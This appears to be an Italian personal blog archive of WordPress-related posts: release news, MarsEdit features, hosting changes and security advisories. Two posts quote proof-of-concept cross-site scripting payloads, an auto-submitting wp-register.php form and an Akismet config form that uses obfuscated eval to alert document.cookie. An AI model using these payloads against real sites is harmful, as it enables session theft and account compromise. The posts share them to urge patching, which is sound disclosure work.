The WordPress Photo Gallery module suffers from a remote SQL injection vulnerability.

[Via - http://packetstormsecurity.org/filedesc/wpgallery-sql.txt.html]

The latest stable release of WordPress (Version 2.5.1) is available in two formats from the links to your right. If you have no idea what to do with this download, we recommend signing up with one of our web hosting partners that offers a one click install of WordPress or getting a free account on WordPress.com.

[Via WordPress › Download]

Non ricordavo quanto fosse noiosa e nel contempo ricca di soddisfazione la procedura di aggiornamento di wordpress. Nel prossimo futuro verrà sicuramente modificata, nel mentre qualche plugin fa già abbastanza bene il suo dovere, ma la cara vecchia guida codex ha un non so che di retrò

Aggiornate gente aggiornate.

[Via MarsEdit 2.1 brings tagging, server drafts]

Finalmente due grosse novità!

La prima è che MarsEdit supporta nativamente i tag nei post,

l’altra riguarda l’ampliamento a 3Gbyte dello spazio disponibile su wordpress.com

Che volete di più dalla vita?

PS: lo so lo so mi accontento di poco, ma vedere i propri suggerimenti accettati ed implementati da un minimo di soddisfazione, ora non resta che pressare per i tecnorati tag

Ritengo scortese pubblicare questo genere di informazioni soprattutto quando si parla del “padrone di casa” … ma tutto sommato … la sicurezza è un processo aperto e condiviso.

Bugtraq ID: 25769

Class: Input Validation Error

CVE: Remote: Yes Local: No

Published: Sep 22 2007 12:00AM

Updated: Sep 22 2007 12:00AM

Credit: Adrian Pastor is credited with the discovery of these vulnerabilities.

Vulnerable: WordPress WordPress 2.0

Ed ecco la PoC

[sourcecode language='xml']
<html>
<head></head>
<body>

<form method=”post” action=”http://target/wordpress/wp-register.php” >
<input type=”hidden” name=”action” value=”register” />
<input type=”hidden” name=”user_login” id=”user_login”
value=’”><script>alert(1)</script>’ />
<input type=”hidden” name=”user_email” id=”user_email”
value=’”><script>alert(2)</script>’ />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>[/sourcecode]

[From WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities]

Tomorrow around 9AM Pacific time we will performing some back-end code changes that may result in a few spots of weirdness for things relating to categories. This includes categorizing posts and links. The maintenance should only take a few minutes but I have allocated a couple hours just in case. Once the maintenance is complete you should see new functionality in your admin area so keep your eyes peeled. I will update this thread once the maintenance is complete. [From Scheduled Maintenance -- Friday 9/21 « WordPress.com Forums]

Ed eccovi qua il bug del giorno, che mi tocca in quanto utilizzatore sfegatato della piattaforma wordpress e del suo inseparabile plugin anti spam (molto da migliorare IMHO!)

WordPress 2.1.3 Akismet Vulnerabilità - Exploit

Gli utenti WordPress che utilizzano il plugin Askimet per combattere lo spam nei commenti farebbero bene a sostituire il plugin “buggato” rilasciato di default con la versione 2.1.3 di WP con Askimet v2.0.2.

Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) ~ mybeNi websecurity

Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible.

<html> <body> <form action=”http://blog.url/wp-admin/plugins.php?page=akismet-key-config” method=”post” id=”akismet-conf”> <input name=”_wpnonce” value=”‘” type=”text”> <input name=”_wp_http_referer” value=”‘%22><script>eval(String.fromCharCode( 97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41) )</script>” type=”text”> <input id=”key” name=”key” size=”15″ maxlength=”12″ value=”1337″> <input name=”submit” value=”Update options »” type=”submit”> </form> </body> </html>

Payload will alert(document.cookie)

Just a PoC, I’m plainly too tired to write full code for making a post or stuff, thanks
UPDATE: The Patch is buggy, Workaround for the wrong “Akismet Link” on your Wordpress Dashboard is avaible here.

Ma è buggata, come avete letto, anche la patch (succede anche nelle migliori famiglie)

Antonio Trigiani w3bL0g - Ingegneria Informatica Virale » Blog Archive » Bug e FIX nell’aggiornamento ad Akismet v2.0.2

Bene, se avete eseguito questo aggiornamento sappiate che è stato inserito un nuovo bug.Per essere più precisi la riga 529

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, clean_url(”$link?page=akismet-admin”), number_format($count) ).’</p>’;

Occorre sostituirla con il seguente workaround:

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, “$link?page=akismet-admin”, number_format($count) ).’</p>’;

Ora, qualcuno saprebbe dirmi in quali altri paradigmi di programmazione collaborativa succedono cose di questo genere?

Patch -> Fix -> Patch -> (e) Fix a poche ore l’uno dall’altro mentre Microsoft impiega settimane… volete altre dimostrazioni? Aspettate pochissimo…

Devo proprio dire che la nuova piattaforma mi aggrada, semplice, abbastanza funzionale (connessione dell’uni permettendo) e famigliare ma venendo da un wordpress.org non poteva che essere così.

Particolarmente interessante è il tag surfer.

Funziona come una specie di feedreader dove però specifico quali sono i TAG che voglio vengano visualizzati. Così facendo posso leggere tutta una serie di articoli che sono stati taggati allo (mio) stesso modo dagli altri membri della community … ed ecco una sorpresa!

Ultra Mobile Personal Computer… e io “perplimo” da pollycoke

Solo pensare di avere un “computing” così pervasivo mi fà fibrillare il cuore… Polly “perplime” io … sono esterrefatto!

Chi ha notato l’interfaccia “multitouch” del dispositivo della ragazza alzi la mano!

Che i media/dispositivi non manchino?

Che manchino i servizi? O manca la fantasia?

Forse mancano i soldi!
PS: in merito a wordpress - mi sento come un bambino a cui è stato dato un giocattolo nuovo (espressione ritrita ma rende sempre)

Reborn!

Abbandonato l’obsoleto servizio di hosting di aruba, ho deciso pigramente (forse come dice Romeo) di affidarmi totalmente ad un provider dedicato, e relegare (ancora per poco) Aruba.it alla gestione dei miei domini.

In attesa che i dns si aggiornino totalmente (? - vi farò leggere un giorno la bizzarra risposta dell’assistenza tecnica)

In attesa che il CNAME www.freeuser.org cessi la sua esistenza a favore del redirect a freeuser.org

In attesa che andrealazzari.eu (ri)sorga

… mi godo il mio nuovo servizio di blogging!

Thanks to Wordpress.com (Grazie poi nemmeno tanto costa cmq 10$/y )

PS: Grazie alle FAQ e all’assistenza tecnica TnX Mark